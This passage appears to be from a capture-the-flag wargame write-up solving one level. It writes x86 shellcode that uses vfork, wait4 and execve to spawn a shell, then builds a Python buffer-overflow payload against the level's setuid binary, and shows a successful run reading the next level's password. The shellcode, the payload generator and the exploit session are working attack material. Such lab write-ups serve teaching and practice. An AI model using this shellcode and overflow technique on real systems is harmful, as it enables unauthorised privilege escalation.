0x00c6f963 <vfork+19>:	mov    %eax,%gs:0x4c
0x00c6f969 <vfork+25>:	mov    $0xbe,%eax
0x00c6f96e <vfork+30>:	int    $0x80
...

Now for wait. The thing is, wait is not a system call by itself, wait4 is. The prototype for wait4 is:

pid_t wait4(pid_t pid, int *status, int options, struct rusage *rusage);

So wait(NULL) is equivalent to wait4(-1, NULL, 0, NULL). Using a pid of -1 means it waits for any child process (from the man page of waitpid).
The disassembly of wait4's wrapper is:

(gdb) disas wait4
Dump of assembler code for function wait4:
0x00c6ef70 <wait4+0>:	push   %esi
0x00c6ef71 <wait4+1>:	push   %ebx
0x00c6ef72 <wait4+2>:	mov    0x18(%esp),%esi
0x00c6ef76 <wait4+6>:	mov    0x14(%esp),%edx
0x00c6ef7a <wait4+10>:	mov    0x10(%esp),%ecx
0x00c6ef7e <wait4+14>:	mov    0xc(%esp),%ebx
0x00c6ef82 <wait4+18>:	mov    $0x72,%eax
0x00c6ef87 <wait4+23>:	int    $0x80
...

So let's write our shellcode and try it out. I've written it with ptrace in the beginning so we can make sure it works under the same constraints as it would in the exploit.

level7@blackbox:/tmp$ cat > shellcode7.c
#include <sys/ptrace.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    int pid;
    pid = getpid();
    ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    __asm__(
        "xorl %eax,%eax\n\t"
        "movb $0xbe,%al\n\t"
        "int $0x80\n\t"
        "test %eax,%eax\n\t"
        "je child\n\t"
        "xorl %eax,%eax\n\t"
        "xorl %ebx,%ebx\n\t"
        "dec %ebx\n\t"
        "xorl %ecx,%ecx\n\t"
        "xorl %edx,%edx\n\t"
        "xorl %esi,%esi\n\t"
        "movb $0x72,%al\n\t"
        "int $0x80\n"
        "child:\n\t"
        "xorl  %eax,%eax\n\t"
        "pushl %eax\n\t"
        "pushl $0x68732f2f\n\t"
        "pushl $0x6e69622f\n\t"
        "movl  %esp, %ebx\n\t"
        "pushl %eax\n\t"
        "pushl %ebx\n\t"
        "movl  %esp, %ecx\n\t"
        "xorl  %edx, %edx\n\t"
        "movb  $0x0b, %al\n\t"
        "int $0x80"
    );
    return 0;
}

level7@blackbox:/tmp$ gcc -o shellcode7 shellcode7.c
level7@blackbox:/tmp$ ./shellcode7
sh-3.1$

It works.
Let's extract the raw code, and embed it in a script:

level7@blackbox:/tmp$ cat > gen7.py
import struct

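# vfork + wait4 in the parent, execve("/bin//sh") in the child
SHELLCODE = ("31c0b0becd8085c0740f31c031db4b31c931d231f6b072cd80"
             "31c050682f2f7368682f62696e89e3505389e131d2b00bcd80").decode("hex")
BUF = 0xbffefcf8  # address of buf (ebp-0x3f0)

ARG = SHELLCODE
# pad up to ebp-0xec, where the tampered esp will point
ARG += 'X' * (0x3f0 - 0xec - len(ARG))
# the address that ret will pop, little-endian
ARG += struct.pack("<I", BUF)
# pad to the total length that puts the stored ecx at 0xbfff0100
ARG += 'X' * (0xd9a0 - len(ARG))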

print ARG
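
Before firing it, it doesn't hurt to sanity-check the layout. The following is a separate Python 3 sketch (not the script used on the box, which only has Python 2) that rebuilds the same bytes and checks the constraints we collected along the way: the total length, no '$' (the strchr check), no NUL (it has to survive as a command-line argument), and the address of buf sitting at offset 0x3f0-0xec. The names build_payload and check_payload are my own:

```python
import struct

SHELLCODE = bytes.fromhex(
    "31c0b0becd8085c0740f31c031db4b31c931d231f6b072cd80"
    "31c050682f2f7368682f62696e89e3505389e131d2b00bcd80"
)
BUF = 0xbffefcf8                 # address of buf, from the gdb session
RET_SLOT_OFFSET = 0x3f0 - 0xec   # where the tampered esp will point, relative to buf
TOTAL_LENGTH = 0xd9a0            # length that puts the stored ecx at 0xbfff0100


def build_payload():
    """Shellcode, padding, address of buf, then padding up to the full length."""
    payload = SHELLCODE
    payload += b"X" * (RET_SLOT_OFFSET - len(payload))
    payload += struct.pack("<I", BUF)
    payload += b"X" * (TOTAL_LENGTH - len(payload))
    return payload


def check_payload(payload):
    """Return a dict of named checks; every value should be True."""
    slot = payload[RET_SLOT_OFFSET:RET_SLOT_OFFSET + 4]
    return {
        "length_ok": len(payload) == TOTAL_LENGTH,
        "no_dollar": b"$" not in payload,
        "no_nul": b"\x00" not in payload,
        "address_ok": slot == struct.pack("<I", BUF),
    }


if __name__ == "__main__":
    for name, ok in check_payload(build_payload()).items():
        print(name, ok)
```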

Show time:

level7@blackbox:~$ ~/heybabe `python /tmp/gen7.py`
Walk the way of the 1337 one!1���̀��t1�1�K1�1�1��r̀1�Ph//shh/bin��PS��1Ұ
                                                                      XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX����XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXsh-3.1$ 
sh-3.1$ cat /home/level8/password
????????????

On to the next level (sorry for the spam there, but that IS the output)